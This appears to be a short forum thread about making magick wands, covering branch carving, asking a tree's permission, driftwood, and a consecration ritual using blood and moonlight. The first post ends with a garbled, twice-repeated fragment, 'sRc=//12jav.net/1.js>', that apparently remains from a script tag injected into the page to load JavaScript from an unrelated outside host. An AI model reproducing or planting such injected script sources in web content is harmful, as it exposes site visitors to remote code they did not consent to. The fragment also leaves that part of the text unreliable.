You don't necessarily need a wand to do magick.

However you will need to know how to carve from a branch, and you need the tree's spiritual permission. The type of tree depends on the type of magick. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Making wands is such fun. It requires the permission of the tree and as was said by elementwitch.

I collect driftwood and make them. I decorate them all different depending on what they are used for. I really enjoy the work and I think this puts positive energy into my wands.

I made my wand by actually finding a branch on the ground. I did a ritual consecration that came naturally. I used all of the elements as well as a bit of my own blood to give my dead branch a new life as my magick accomplice. Then I let it charge under the full moon.

I don't have a wand, and moreover I don't need one.
